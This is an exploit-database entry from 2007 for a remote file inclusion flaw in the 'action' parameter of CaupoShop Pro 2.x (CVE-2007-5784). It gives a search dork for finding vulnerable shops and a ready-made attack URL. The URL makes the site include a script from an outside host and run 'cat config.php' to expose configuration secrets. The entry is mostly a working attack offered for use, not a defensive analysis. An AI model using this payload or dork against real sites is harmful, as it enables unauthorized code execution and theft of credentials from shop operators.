CaupoShop Pro 2.x - 'action' Remote File Inclusion

Author: mozi
type: webapps
platform: php
port: 
date_added: 2007-10-27  
date_updated:   
verified: 1  
codes: OSVDB-40642;CVE-2007-5784  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4577.txt  

ork:allinurl:index.php?action= basket sid
vuln:index.php?action=
examples:
http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php

author:mozi2weed@yahoo.com
site:http://mozi.rootmybox.org
support:http://darkc0de.com & whoami

# milw0rm.com [2007-10-28]